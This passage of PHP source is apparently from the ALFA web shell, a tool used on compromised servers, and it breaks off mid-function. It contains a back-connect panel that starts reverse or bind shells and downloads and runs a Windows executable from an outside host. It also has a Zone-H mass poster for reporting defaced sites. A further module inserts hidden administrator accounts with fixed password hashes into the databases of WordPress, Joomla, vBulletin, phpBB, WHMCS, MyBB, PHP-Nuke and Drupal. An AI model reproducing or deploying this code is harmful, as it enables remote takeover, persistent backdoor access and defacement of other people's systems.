    echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">\n<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
    $cbArr = array("php" => "Php", "perl" => "Perl", "python" => "Python", "ruby" => "Ruby", "c" => "C", "java" => "Java", "node" => "NodeJs", "bcwin" => "Windows");
    foreach ($cbArr as $key => $val) {
        echo "<option value='{$key}' " . ($GLOBALS['sys'] == 'win' ? 'selected' : '') . ">{$val}</option>";
    }
    echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
    if (isset($_POST['alfa1']) && !empty($_POST['alfa1'])) {
        $lang = $_POST['alfa1'];
        $ip = $_POST['alfa2'];
        $port = $_POST['alfa3'];
        $arg = $_POST['alfa4'] == 'bind' ? $port : $port . ' ' . $ip;
        $tmpdir = ALFA_TEMPDIR;
        $name = "ALFA_TEMPDIR/" . $lang . uniqid() . rand(1, 99999);
        $allow = array('perl', 'ruby', 'python', 'node');
        eval('$lan=$' . $lang . ';');
        if (in_array($lang, $allow)) {
            if (__write_file($name, __get_resource($lan))) {
                if (_alfa_can_runCommand(true, true)) {
                    $os = $GLOBALS['sys'] != 'win' ? '1>/dev/null 2>&1 &' : '';
                    $out = alfaEx("{$lang} {$name} {$arg} {$os}");
                    if ($out == '') {
                        $out = "<font color='green'><center>[ Finished...! ]</center></font>";
                    }
                    echo "<pre class='ml1' style='margin-top:5px'>{$out}</pre>";
                }
            } else {
                echo "<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>";
            }
        }
        if ($lang == 'java' || $lang == 'c') {
            $code = __get_resource($lan);
            $out = nl2br(bcinit($lang, $code, '', ''));
            echo "<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>";
        }
        if ($lang == 'bcwin') {
            $alfa = new AlfaCURL();
            $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
            $tmpdir = ALFA_TEMPDIR;
            $f = @fopen("ALFA_TEMPDIR/bcwin.exe", 'w+');
            @fwrite($f, $s);
            @fclose($f);
            $out = alfaEx("ALFA_TEMPDIR/bcwin.exe " . $_POST['alfa2'] . " " . $_POST['alfa3']);
        }
        if ($lang == 'php') {
            echo "<pre class=ml1 style='margin-top:5px'>";
            $code = __get_resource($lan);
            if ($code !== false) {
                $code = "\$target = \"" . $arg . "\";\n" . $code;
                eval($code);
                echo "<center><font color='green'>[ Finished...! ]</font></center>";
            }
            echo "</pre>";
        }
    }
    echo "</div>";
    alfafooter();
}
function alfazoneh()
{
    alfahead();
    echo "<div class=header>";
    if (!function_exists('curl_version')) {
        echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
    }
    $hackmode = array('known vulnerability (i.e. unpatched system)', 'undisclosed (new) vulnerability', 'configuration / admin. mistake', 'brute force attack', 'social engineering', 'Web Server intrusion', 'Web Server external module intrusion', 'Mail Server intrusion', 'FTP Server intrusion', 'SSH Server intrusion', 'Telnet Server intrusion', 'RPC Server intrusion', 'Shares misconfiguration', 'Other Server intrusion', 'SQL Injection', 'URL Poisoning', 'File Inclusion', 'Other Web Application bug', 'Remote administrative panel access bruteforcing', 'Remote administrative panel access password guessing', 'Remote administrative panel access social engineering', 'Attack against administrator(password stealing/sniffing)', 'Access credentials through Man In the Middle attack', 'Remote service password guessing', 'Remote service password bruteforce', 'Rerouting after attacking the Firewall', 'Rerouting after attacking the Router', 'DNS attack through social engineering', 'DNS attack through cache poisoning', 'Not available', 'Cross-Site Scripting');
    $reason = array('Heh...just for fun!', 'Revenge against that website', 'Political reasons', 'As a challenge', 'I just want to be the best defacer', 'Patriotism', 'Not available');
    echo "\n<center><br><div class=\"txtfont_header\">| Zone-h Mass Poster |</div><center><br>\n<form action=\"\" method=\"post\" onsubmit=\"g('zoneh',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,'>>'); return false;\">\n<input type=\"text\" name=\"defacer\" size=\"67\" id=\"text\" placeholder=\"ALFA TEaM 2012\" />\n<br>\n<select id=\"text\" name=\"hackmode\" style=\"width:400px;\">";
    $x = 1;
    foreach ($hackmode as $mode) {
        echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
        $x++;
    }
    echo "</select><br><select id=\"text\" name=\"reason\" style=\"width:200px;\">";
    $x = 1;
    foreach ($reason as $mode) {
        echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
        $x++;
    }
    echo "</select><br>\n<textarea name=\"domain\" cols=\"90\" rows=\"20\" placeholder=\"Domains...\"></textarea><br>\n<p><input type=\"submit\" value=\" \" name=\"go\" /></p>\n</form></center>";
    if ($_POST['alfa5'] && $_POST['alfa5'] == '>>') {
        ob_start();
        $hacker = $_POST['alfa1'];
        $method = $_POST['alfa2'];
        $neden = $_POST['alfa3'];
        $site = $_POST['alfa4'];
        if (empty($hacker)) {
            die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
        } elseif ($method == "------------------------------------SELECT-------------------------------------") {
            die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
        } elseif ($neden == "------------------------------------SELECT-------------------------------------") {
            die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
        } elseif (empty($site)) {
            die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
        }
        $i = 0;
        $sites = explode("\n", $site);
        $alfa = new AlfaCURL();
        while ($i < count($sites)) {
            if (substr($sites[$i], 0, 4) != "http") {
                $sites[$i] = "http://" . $sites[$i];
            }
            $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden);
            ++$i;
        }
        echo __pre() . "<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
    }
    echo "</div>";
    alfafooter();
}
function alfapwchanger()
{
    alfahead();
    echo "<div class=header><center><br><div class=\"txtfont_header\">| Add New Admin |</div>\n<center><h3>";
    $vals = array('WordPress' => array('wp', 2), 'Joomla' => array('joomla', 3), 'vBulletin' => array('vb', 5), 'phpBB' => array('phpbb', 6), 'WHMCS' => array('whmcs', 7), 'MyBB' => array('mybb', 8), 'Php Nuke' => array('nuke', 9), 'Drupal' => array('drupal', 10), 'SMF' => array('smf', 11));
    Alfa_Create_A_Tag('pwchanger', $vals);
    echo "</h3></center>";
    if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp') {
        echo __pre() . '<center><center><div class="txtfont_header">| WordPress |</div>
<p>' . getConfigHtml('wp') . '</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form>";
        if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
            $localhost = $_POST['alfa3'];
            $database = $_POST['alfa4'];
            $username = $_POST['alfa5'];
            $password = $_POST['alfa6'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'{$admin}','d4a590caacc0be55ef286e40a945ea45','{$SQL}')") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn));
            $sole = @mysqli_num_rows($solevisible);
            if ($sole == 1) {
                $solevis = @mysqli_fetch_assoc($solevisible);
                $res = $solevis['ID'];
            }
            $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla') {
        echo __pre() . '<center><center><div class="txtfont_header">| Joomla |</div><p><p>' . getConfigHtml('joomla') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa3'];
            $database = $_POST['alfa4'];
            $username = $_POST['alfa5'];
            $password = $_POST['alfa6'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn));
            $sole = @mysqli_num_rows($solevisible);
            if ($sole == 1) {
                $solevis = @mysqli_fetch_assoc($solevisible);
                $res = $solevis['id'];
            }
            $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb') {
        echo __pre() . '<center><center><div class="txtfont_header">| vBulletin |<div><p>' . getConfigHtml('vb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa5'];
            $password = $_POST['alfa6'];
            $prefix = $_POST['alfa7'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','{$admin}','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','{$SQL}','" . date('Y-m-d') . "','" . time() . "')") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn));
            $sole = mysqli_num_rows($solevisible);
            if ($sole == 1) {
                $solevis = mysqli_fetch_assoc($solevisible);
                $res = $solevis['userid'];
            }
            $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','16744444')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb') {
        echo __pre() . '<center><div class="txtfont_header">| phpBB |</div><p><p>' . getConfigHtml('phpbb') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa4'];
            $password = $_POST['alfa6'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $hash = md5('solevisible');
            $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs') {
        echo __pre() . '<center><div class="txtfont_header">| Whmcs |</div><p><p>' . getConfigHtml('whmcs') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa4'];
            $password = $_POST['alfa5'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb') {
        echo __pre() . '<center><div class="txtfont_header">| Mybb |</div><p><p>' . getConfigHtml('mybb') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa4'];
            $password = $_POST['alfa5'];
            $admin = $_POST['alfa8'];
            $SQL = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke') {
        echo __pre() . '<center><div class="txtfont_header">| PhpNuke |</div><p><p>' . getConfigHtml('phpnuke') . '</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa3'];
            $username = $_POST['alfa4'];
            $password = $_POST['alfa5'];
            $admin = $_POST['alfa7'];
            $SQL = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $hash = md5($pwd);
            $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('{$admin}','God','{$SQL}','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal') {
        echo __pre() . '<center><div class="txtfont_header">| Drupal |</div><p><p>' . getConfigHtml('drupal') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
        create_table($table);
        echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
        if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
            $localhost = $_POST['alfa2'];
            $database = $_POST['alfa4'];
            $username = $_POST['alfa5'];
            $password = $_POST['alfa6'];
            $admin = $_POST['alfa8'];
            $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
            $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1");
            $getDescuid = @mysqli_fetch_assoc($getDescuid);
            $getDescuid = $getDescuid['uid'];
            $getdescuid = $getDescuid++;
            $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('{$getDescuid}','{$admin}','\$S\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
            $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn));
            $sole = mysqli_num_rows($solevisible);
            if ($sole == 1) {
                $solevis = mysqli_fetch_assoc($solevisible);
                $res = $solevis['uid'];
            }
            $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn));
            if ($solevisible) {
                __alert('Success... ' . $admin . ' is created...');
            }
        }
    }
    if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf') {
